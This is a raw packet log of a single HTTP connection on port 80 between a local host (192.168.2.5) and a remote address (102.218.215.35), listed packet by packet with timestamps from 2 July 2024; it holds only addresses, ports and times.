Jul 2, 2024 08:14:31.661098003 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.661101103 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.661139011 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.661218882 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.890189886 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890206099 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890299082 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890341997 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890353918 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890672922 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890675068 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.890690088 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890893936 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.890908957 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890950918 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.890963078 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.891087055 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.891103029 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.891122103 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.891982079 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892034054 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.892049074 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892059088 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892071009 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892081976 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892147064 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.892246008 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.892513037 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892613888 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892625093 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892661095 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892676115 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.892697096 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.893404961 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.893450975 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.893475056 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.893599033 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:31.895833015 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.895931005 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:31.899882078 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.127078056 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127105951 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127116919 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127185106 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.127213955 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.127232075 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127243996 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127266884 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.127319098 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.127938032 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127950907 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127962112 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127973080 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.127974987 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.127984047 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128009081 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.128058910 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.128146887 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128196955 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128207922 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128221989 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.128263950 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.128298998 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128309011 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128319979 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128344059 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.128379107 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.128441095 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128453016 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128504992 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.128901958 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128964901 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.128982067 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129005909 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129014969 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.129015923 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129028082 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.129065990 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.129259109 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129321098 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129333019 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129350901 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.129384041 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.129410982 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129422903 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129435062 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.129470110 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.129488945 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130024910 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130095005 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130099058 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130150080 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130188942 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130188942 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130208969 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130219936 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130265951 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130275965 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130276918 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130347013 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130697012 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130739927 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130752087 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130780935 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130780935 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.130806923 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130817890 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.130872011 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.131367922 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.131378889 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.131391048 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.131444931 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.131444931 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.131468058 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.131478071 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.131526947 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.132330894 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.132350922 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.132399082 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.132399082 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.132435083 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.132447004 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.132457972 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.132477045 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.132494926 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.364247084 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364312887 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364324093 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364406109 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364417076 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364413977 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.364428043 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364458084 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.364468098 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.364723921 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364765882 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364768982 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.364777088 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364814043 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.364840984 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364852905 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.364903927 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.365489006 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365498066 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365509987 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365547895 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.365551949 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365562916 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365575075 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365588903 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.365606070 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.365649939 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365686893 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.365741014 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365756989 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365767956 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365778923 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.365789890 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366092920 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366166115 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366177082 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366187096 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366262913 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366275072 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366286039 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366297007 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366322994 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366369009 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366379976 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366838932 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366889954 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366900921 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366952896 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.366964102 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367424011 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367527962 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367538929 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367557049 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367567062 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367578030 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367794037 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.367872000 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.367902994 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367944002 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367954969 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367976904 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367988110 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.367988110 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.367997885 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.368014097 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.368038893 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369280100 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369323969 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369352102 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369362116 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369371891 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369384050 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369391918 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369394064 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369401932 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369405985 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369431019 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369442940 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369474888 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369487047 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369518995 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369591951 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369602919 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369612932 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369625092 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369636059 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369638920 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369647980 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369649887 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369682074 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369836092 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369847059 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369857073 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369879961 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369893074 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369900942 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369911909 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369935989 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369947910 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369975090 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.369987965 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.369998932 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370008945 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370028019 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370043993 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370055914 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370070934 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370155096 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370166063 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370193005 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370204926 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370529890 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370548964 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370559931 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370572090 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370594025 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370594978 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370624065 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370625973 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370634079 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370661020 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370740891 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370749950 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370762110 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370773077 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370778084 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370791912 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370794058 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370805979 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370825052 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.370825052 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370836020 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.370863914 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.371139050 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.371174097 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.371185064 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.371186018 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.371203899 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.371208906 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.371217966 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.371234894 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.371339083 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.371444941 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.371483088 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453003883 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453020096 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453059912 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453071117 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453082085 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453094006 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453142881 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453180075 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453216076 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453226089 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453236103 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453237057 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453248978 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453259945 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453277111 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453315020 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453407049 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453454971 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453466892 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453479052 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453520060 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.453568935 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453581095 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.453624010 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601157904 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601176023 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601188898 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601208925 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601219893 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601300955 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601345062 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601356983 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601376057 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601386070 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601387024 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601409912 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601438046 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601448059 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601453066 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601491928 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601583004 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601596117 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601608038 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601629019 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601656914 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601663113 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601674080 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601718903 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.601795912 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.601839066 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602044106 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602085114 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602088928 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602094889 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602118969 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602138996 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602236032 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602246046 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602256060 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602276087 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602298975 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602785110 CEST	80	49714	102.218.215.35	192.168.2.5
Jul 2, 2024 08:14:32.602830887 CEST	49714	80	192.168.2.5	102.218.215.35
Jul 2, 2024 08:14:32.602854013 CEST	80	49714	102.218.215.35	192.168.2.5
